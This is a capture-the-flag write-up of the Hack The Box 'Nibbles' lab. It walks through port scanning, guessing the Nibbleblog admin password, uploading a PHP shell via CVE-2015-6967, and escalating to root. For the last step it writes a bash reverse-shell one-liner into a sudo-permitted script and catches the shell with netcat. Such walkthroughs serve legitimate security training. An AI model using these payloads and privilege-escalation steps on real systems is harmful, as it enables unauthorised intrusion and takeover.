Nibbles - Hack The Box

How to crack Nibbles box without Metasploit.

tl;dr

• Nibbleblog v4.0.3 Code Execution
• CVE-2015-6967

Solved by: 7h3M0nk

A Linux box with IP 10.10.10.75

Enumeration

Let’s start by doing a port scan. I am using nmap enumeratior, so doing a basic scan

┌──(kali㉿kali)-[~/HackTheBox/Nibble/10.10.10.75/nmap]
└─$ nmapenumertor 10.10.10.75 Basic
 Nmap 7.91 scan initiated Tue Feb  9 03:27:22 2021 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.75.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Tue Feb  9 03:27:36 2021 -- 1 IP address (1 host up) scanned in 13.94 seconds

The box has two services one OpenSSH at port 22 and an Apache server at port 80. The Apache version mentioned here is vulnerable to the shellshock vulnerability. On checking the http://10.10.10.75/cgi-bin/ , it’s showing directory not found.

Time to move on.

On checking the page source, I got the info

Let’s checkout the /nibbleblog directory.

Time to get more info on Nibbles. Doing a serach on Nibble Blog landed me into a page which describes how one can upload a shell to Nibble 4.0.3 version.

As per the blog, if I get admin access then I can upload a php shell.

Checking if admin.php exists.

This is where I got stuck for a while, tried to login using some default passwords this got me blacklisted. Tried the page after a couple of minutes, not blacklisted anymore. Brute forcing won’t work here. Need to guess!

Tried admin:nibbles which worked got admin access. Pheeww!

Exploit

Recreating the steps given in the blog.

Uploading a php shell

Moving to the plugin directory, and opening the shell and getting the user flag.

We don’t have root access till now, let’s check if the user has any binaries with sudo permission.

sudo -l

[email protected]
:/home/nibbler# sudo -l

sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Nice! The directory personal/stuff is not present. Let’s make one and add the file monitor.sh.
We can use this to create a reverse shell and get the root flag.

[email protected]:/home/nibbler/personal/stuff# touch monitor.sh;echo "#!/bin/bash" >> monitor.sh; echo "bash -i >& /dev/tcp/10.10.14.7/800 0>&1" >> monitor.sh

[email protected]:/home/nibbler/personal/stuff# chmod +x monitor.sh;sudo ./monitor.sh

┌──(kali㉿kali)-[~/bi0s]
└─$ sudo nc -nvlp 800
[sudo] password for kali: 
listening on [any] 800 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.75] 37638
bash: cannot set terminal process group (1328): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/nibbler/personal/stuff# whoami
whoami
root
[email protected]:/home/nibbler/personal/stuff# cd /home/
cd /home/
[email protected]:/home# ls
ls
nibbler
[email protected]:/home# cd /
cd /
[email protected]:/# cd /root/
cd /root/
[email protected]:~# ls
ls
root.txt
[email protected]:~# cat root.txt
cat root.txt

And that’s how I solved Nibbles!